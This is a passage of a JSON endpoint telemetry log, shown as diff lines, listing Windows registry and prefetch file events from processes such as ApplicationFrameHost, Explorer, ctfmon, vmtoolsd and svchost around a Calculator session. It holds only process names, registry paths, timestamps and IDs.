"HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", - "registry_path": 
"HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App\\ButtonPressedBackgroundColor", - "registry_value": "ButtonPressedBackgroundColor", - "timestamp": 131883573248700016, - "unique_pid": "{42FC7E13-B313-5C05-0000-001087F10600}" - }, - { - "event_type": "registry", - "pid": 5652, - "process_name": "ApplicationFrameHost.exe", - "process_path": "C:\\WINDOWS\\system32\\ApplicationFrameHost.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", - "registry_value": "Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", - "timestamp": 131883573248700016, - "unique_pid": "{42FC7E13-B313-5C05-0000-001087F10600}" - }, - { - "event_type": "registry", - "pid": 5652, - "process_name": "ApplicationFrameHost.exe", - "process_path": "C:\\WINDOWS\\system32\\ApplicationFrameHost.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local 
Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App\\ButtonPressedForegroundColor", - "registry_value": "ButtonPressedForegroundColor", - "timestamp": 131883573248700016, - "unique_pid": "{42FC7E13-B313-5C05-0000-001087F10600}" - }, - { - "event_type": "registry", - "pid": 5652, - "process_name": "ApplicationFrameHost.exe", - "process_path": "C:\\WINDOWS\\system32\\ApplicationFrameHost.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", - "registry_value": "Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", - "timestamp": 131883573248700016, - "unique_pid": "{42FC7E13-B313-5C05-0000-001087F10600}" - }, - { - "event_type": "registry", - "pid": 5652, - "process_name": "ApplicationFrameHost.exe", - "process_path": "C:\\WINDOWS\\system32\\ApplicationFrameHost.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App\\ButtonBackgroundColorInactive", - "registry_value": 
"ButtonBackgroundColorInactive", - "timestamp": 131883573248700016, - "unique_pid": "{42FC7E13-B313-5C05-0000-001087F10600}" - }, - { - "event_type": "registry", - "pid": 5652, - "process_name": "ApplicationFrameHost.exe", - "process_path": "C:\\WINDOWS\\system32\\ApplicationFrameHost.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", - "registry_value": "Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", - "timestamp": 131883573248700016, - "unique_pid": "{42FC7E13-B313-5C05-0000-001087F10600}" - }, - { - "event_type": "registry", - "pid": 5652, - "process_name": "ApplicationFrameHost.exe", - "process_path": "C:\\WINDOWS\\system32\\ApplicationFrameHost.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App\\ButtonForegroundColorInactive", - "registry_value": "ButtonForegroundColorInactive", - "timestamp": 131883573248700016, - "unique_pid": "{42FC7E13-B313-5C05-0000-001087F10600}" - }, - { - "event_type": "registry", - "pid": 4516, - "process_name": "ctfmon.exe", - "process_path": 
"C:\\WINDOWS\\system32\\ctfmon.exe", - "registry_key": "HKLM", - "registry_path": "HKLM\\SOFTWARE", - "registry_value": "SOFTWARE", - "timestamp": 131883573248700016, - "unique_pid": "{42FC7E13-B2C7-5C05-0000-001046BF0300}" - }, - { - "event_type": "registry", - "pid": 4516, - "process_name": "ctfmon.exe", - "process_path": "C:\\WINDOWS\\system32\\ctfmon.exe", - "registry_key": "HKLM\\SOFTWARE", - "registry_path": "HKLM\\SOFTWARE\\Microsoft", - "registry_value": "Microsoft", - "timestamp": 131883573248700016, - "unique_pid": "{42FC7E13-B2C7-5C05-0000-001046BF0300}" - }, - { - "event_type": "registry", - "pid": 4516, - "process_name": "ctfmon.exe", - "process_path": "C:\\WINDOWS\\system32\\ctfmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Input", - "registry_value": "Input", - "timestamp": 131883573248700016, - "unique_pid": "{42FC7E13-B2C7-5C05-0000-001046BF0300}" - }, - { - "event_type": "registry", - "pid": 4744, - "process_name": "Explorer.EXE", - "process_path": "C:\\WINDOWS\\Explorer.EXE", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\UserAssist\\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\\Count\\{1NP14R77-02R7-4R5Q-O744-2RO1NR5198O7}\\JvaqbjfCbjreFuryy\\i1.0", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\UserAssist\\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\\Count\\{1NP14R77-02R7-4R5Q-O744-2RO1NR5198O7}\\JvaqbjfCbjreFuryy\\i1.0\\cbjrefuryy.rkr", - "registry_value": "cbjrefuryy.rkr", - "timestamp": 131883573248860000, - "unique_pid": "{42FC7E13-B2CF-5C05-0000-001082530400}" - }, - { - "event_type": "registry", - "pid": 4744, - "process_name": "Explorer.EXE", - "process_path": "C:\\WINDOWS\\Explorer.EXE", - "registry_key": 
"HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\UserAssist\\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\\Count", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\UserAssist\\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\\Count\\HRZR_PGYFRFFVBA", - "registry_value": "HRZR_PGYFRFFVBA", - "timestamp": 131883573248860000, - "unique_pid": "{42FC7E13-B2CF-5C05-0000-001082530400}" - }, - { - "event_type": "registry", - "pid": 4516, - "process_name": "ctfmon.exe", - "process_path": "C:\\WINDOWS\\system32\\ctfmon.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Input", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Input\\Locales", - "registry_value": "Locales", - "timestamp": 131883573248860000, - "unique_pid": "{42FC7E13-B2C7-5C05-0000-001046BF0300}" - }, - { - "event_type": "registry", - "pid": 4744, - "process_name": "Explorer.EXE", - "process_path": "C:\\WINDOWS\\Explorer.EXE", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\SessionInfo\\1\\ApplicationViewManagement", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\SessionInfo\\1\\ApplicationViewManagement\\WRT:Microsoft.WindowsCalculator_8wekyb3d8bbwe!App+3", - "registry_value": "WRT:Microsoft.WindowsCalculator_8wekyb3d8bbwe!App+3", - "timestamp": 131883573249009984, - "unique_pid": "{42FC7E13-B2CF-5C05-0000-001082530400}" - }, - { - "event_type": "registry", - "pid": 4744, - "process_name": "Explorer.EXE", - "process_path": "C:\\WINDOWS\\Explorer.EXE", - "registry_key": 
"HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\SessionInfo\\1\\ApplicationViewManagement\\WRT:Microsoft.WindowsCalculator_8wekyb3d8bbwe!App+3", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\SessionInfo\\1\\ApplicationViewManagement\\WRT:Microsoft.WindowsCalculator_8wekyb3d8bbwe!App+3\\ShowInSwitchers", - "registry_value": "ShowInSwitchers", - "timestamp": 131883573249009984, - "unique_pid": "{42FC7E13-B2CF-5C05-0000-001082530400}" - }, - { - "event_type": "registry", - "pid": 4744, - "process_name": "Explorer.EXE", - "process_path": "C:\\WINDOWS\\Explorer.EXE", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\SessionInfo\\1\\ApplicationViewManagement", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\SessionInfo\\1\\ApplicationViewManagement\\WRT:Microsoft.WindowsCalculator_8wekyb3d8bbwe!App+3", - "registry_value": "WRT:Microsoft.WindowsCalculator_8wekyb3d8bbwe!App+3", - "timestamp": 131883573249170000, - "unique_pid": "{42FC7E13-B2CF-5C05-0000-001082530400}" - }, - { - "event_type": "registry", - "pid": 4744, - "process_name": "Explorer.EXE", - "process_path": "C:\\WINDOWS\\Explorer.EXE", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\SessionInfo\\1\\ApplicationViewManagement\\WRT:Microsoft.WindowsCalculator_8wekyb3d8bbwe!App+3", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\SessionInfo\\1\\ApplicationViewManagement\\WRT:Microsoft.WindowsCalculator_8wekyb3d8bbwe!App+3\\VirtualDesktop", - "registry_value": "VirtualDesktop", - "timestamp": 131883573249170000, - "unique_pid": 
"{42FC7E13-B2CF-5C05-0000-001082530400}" - }, - { - "event_type": "registry", - "pid": 2688, - "process_name": "vmtoolsd.exe", - "process_path": "C:\\Program Files\\VMware\\VMware Tools\\vmtoolsd.exe", - "registry_key": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip", - "registry_path": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip\\Parameters", - "registry_value": "Parameters", - "timestamp": 131883573249330000, - "unique_pid": "{42FC7E13-B2AE-5C05-0000-0010F8050200}" - }, - { - "event_type": "registry", - "pid": 2688, - "process_name": "vmtoolsd.exe", - "process_path": "C:\\Program Files\\VMware\\VMware Tools\\vmtoolsd.exe", - "registry_key": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip", - "registry_path": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip\\Parameters", - "registry_value": "Parameters", - "timestamp": 131883573249330000, - "unique_pid": "{42FC7E13-B2AE-5C05-0000-0010F8050200}" - }, - { - "event_type": "registry", - "pid": 2688, - "process_name": "vmtoolsd.exe", - "process_path": "C:\\Program Files\\VMware\\VMware Tools\\vmtoolsd.exe", - "registry_key": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip", - "registry_path": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip\\Parameters", - "registry_value": "Parameters", - "timestamp": 131883573249330000, - "unique_pid": "{42FC7E13-B2AE-5C05-0000-0010F8050200}" - }, - { - "event_type": "registry", - "pid": 5824, - "process_name": "SearchIndexer.exe", - "process_path": "C:\\WINDOWS\\system32\\SearchIndexer.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows Search\\Gather\\Windows\\SystemIndex", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows Search\\Gather\\Windows\\SystemIndex\\NewClientID", - "registry_value": "NewClientID", - "timestamp": 131883573249330000, - "unique_pid": "{42FC7E13-B303-5C05-0000-0010823E0600}" - }, - { - "event_type": "registry", - "pid": 4744, - "process_name": "Explorer.EXE", - "process_path": "C:\\WINDOWS\\Explorer.EXE", - "registry_key": 
"HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\ActivityDataModel\\ReaderRevisionInfo", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\ActivityDataModel\\ReaderRevisionInfo\\C9DD546D-51CE-5F51-47F7-F7BA79663637", - "registry_value": "C9DD546D-51CE-5F51-47F7-F7BA79663637", - "timestamp": 131883573249330000, - "unique_pid": "{42FC7E13-B2CF-5C05-0000-001082530400}" - }, - { - "event_type": "registry", - "pid": 4744, - "process_name": "Explorer.EXE", - "process_path": "C:\\WINDOWS\\Explorer.EXE", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\SessionInfo\\1\\ImmersiveShell\\PersistedApplicationData\\Volatile", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\SessionInfo\\1\\ImmersiveShell\\PersistedApplicationData\\Volatile\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", - "registry_value": "Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", - "timestamp": 131883573249480000, - "unique_pid": "{42FC7E13-B2CF-5C05-0000-001082530400}" - }, - { - "event_type": "file", - "file_name": "REGSVR32.EXE-55A4EE79.pf", - "file_path": "C:\\Windows\\Prefetch\\REGSVR32.EXE-55A4EE79.pf", - "pid": 1692, - "process_name": "svchost.exe", - "process_path": "c:\\windows\\system32\\svchost.exe", - "timestamp": 131883573249640000, - "unique_pid": "{42FC7E13-B2A2-5C05-0000-00102F790100}" - }, - { - "event_type": "file", - "file_name": "REGSVR32.EXE-A65A209D.pf", - "file_path": "C:\\Windows\\Prefetch\\REGSVR32.EXE-A65A209D.pf", - "pid": 1692, - "process_name": "svchost.exe", - "process_path": "c:\\windows\\system32\\svchost.exe", - "timestamp": 131883573249640000, - "unique_pid": "{42FC7E13-B2A2-5C05-0000-00102F790100}" - }, - { - "event_type": "file", - "file_name": "CALC.EXE-AC08706A.pf", - "file_path": 
"C:\\Windows\\Prefetch\\CALC.EXE-AC08706A.pf", - "pid": 1692, - "process_name": "svchost.exe", - "process_path": "c:\\windows\\system32\\svchost.exe", - "timestamp": 131883573249640000, - "unique_pid": "{42FC7E13-B2A2-5C05-0000-00102F790100}" - }, - { - "event_type": "registry", - "pid": 5652, - "process_name": "ApplicationFrameHost.exe", - "process_path": "C:\\WINDOWS\\system32\\ApplicationFrameHost.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", - "registry_value": "Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", - "timestamp": 131883573249800000, - "unique_pid": "{42FC7E13-B313-5C05-0000-001087F10600}" - }, - { - "event_type": "registry", - "pid": 5652, - "process_name": "ApplicationFrameHost.exe", - "process_path": "C:\\WINDOWS\\system32\\ApplicationFrameHost.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App\\ButtonBackgroundColor", - "registry_value": "ButtonBackgroundColor", - "timestamp": 131883573249800000, - "unique_pid": "{42FC7E13-B313-5C05-0000-001087F10600}" - }, - { - "event_type": 
"registry", - "pid": 5652, - "process_name": "ApplicationFrameHost.exe", - "process_path": "C:\\WINDOWS\\system32\\ApplicationFrameHost.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", - "registry_value": "Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", - "timestamp": 131883573249800000, - "unique_pid": "{42FC7E13-B313-5C05-0000-001087F10600}" - }, - { - "event_type": "registry", - "pid": 5652, - "process_name": "ApplicationFrameHost.exe", - "process_path": "C:\\WINDOWS\\system32\\ApplicationFrameHost.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App\\ButtonForegroundColor", - "registry_value": "ButtonForegroundColor", - "timestamp": 131883573249800000, - "unique_pid": "{42FC7E13-B313-5C05-0000-001087F10600}" - }, - { - "event_type": "registry", - "pid": 5652, - "process_name": "ApplicationFrameHost.exe", - "process_path": "C:\\WINDOWS\\system32\\ApplicationFrameHost.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local 
Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", - "registry_value": "Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", - "timestamp": 131883573249800000, - "unique_pid": "{42FC7E13-B313-5C05-0000-001087F10600}" - }, - { - "event_type": "registry", - "pid": 5652, - "process_name": "ApplicationFrameHost.exe", - "process_path": "C:\\WINDOWS\\system32\\ApplicationFrameHost.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App\\ButtonHoverBackgroundColor", - "registry_value": "ButtonHoverBackgroundColor", - "timestamp": 131883573249800000, - "unique_pid": "{42FC7E13-B313-5C05-0000-001087F10600}" - }, - { - "event_type": "registry", - "pid": 5652, - "process_name": "ApplicationFrameHost.exe", - "process_path": "C:\\WINDOWS\\system32\\ApplicationFrameHost.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local 
Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", - "registry_value": "Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", - "timestamp": 131883573249800000, - "unique_pid": "{42FC7E13-B313-5C05-0000-001087F10600}" - }, - { - "event_type": "registry", - "pid": 5652, - "process_name": "ApplicationFrameHost.exe", - "process_path": "C:\\WINDOWS\\system32\\ApplicationFrameHost.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App\\ButtonHoverForegroundColor", - "registry_value": "ButtonHoverForegroundColor", - "timestamp": 131883573249800000, - "unique_pid": "{42FC7E13-B313-5C05-0000-001087F10600}" - }, - { - "event_type": "registry", - "pid": 5652, - "process_name": "ApplicationFrameHost.exe", - "process_path": "C:\\WINDOWS\\system32\\ApplicationFrameHost.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", - "registry_value": 
"Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", - "timestamp": 131883573249800000, - "unique_pid": "{42FC7E13-B313-5C05-0000-001087F10600}" - }, - { - "event_type": "registry", - "pid": 5652, - "process_name": "ApplicationFrameHost.exe", - "process_path": "C:\\WINDOWS\\system32\\ApplicationFrameHost.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App\\ButtonPressedBackgroundColor", - "registry_value": "ButtonPressedBackgroundColor", - "timestamp": 131883573249800000, - "unique_pid": "{42FC7E13-B313-5C05-0000-001087F10600}" - }, - { - "event_type": "registry", - "pid": 5652, - "process_name": "ApplicationFrameHost.exe", - "process_path": "C:\\WINDOWS\\system32\\ApplicationFrameHost.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", - "registry_value": "Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", - "timestamp": 131883573249800000, - "unique_pid": "{42FC7E13-B313-5C05-0000-001087F10600}" - }, - { - "event_type": "registry", - "pid": 5652, - "process_name": "ApplicationFrameHost.exe", - 
"process_path": "C:\\WINDOWS\\system32\\ApplicationFrameHost.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App\\ButtonPressedForegroundColor", - "registry_value": "ButtonPressedForegroundColor", - "timestamp": 131883573249800000, - "unique_pid": "{42FC7E13-B313-5C05-0000-001087F10600}" - }, - { - "event_type": "registry", - "pid": 5652, - "process_name": "ApplicationFrameHost.exe", - "process_path": "C:\\WINDOWS\\system32\\ApplicationFrameHost.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", - "registry_value": "Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", - "timestamp": 131883573249800000, - "unique_pid": "{42FC7E13-B313-5C05-0000-001087F10600}" - }, - { - "event_type": "registry", - "pid": 5652, - "process_name": "ApplicationFrameHost.exe", - "process_path": "C:\\WINDOWS\\system32\\ApplicationFrameHost.exe", - "registry_key": 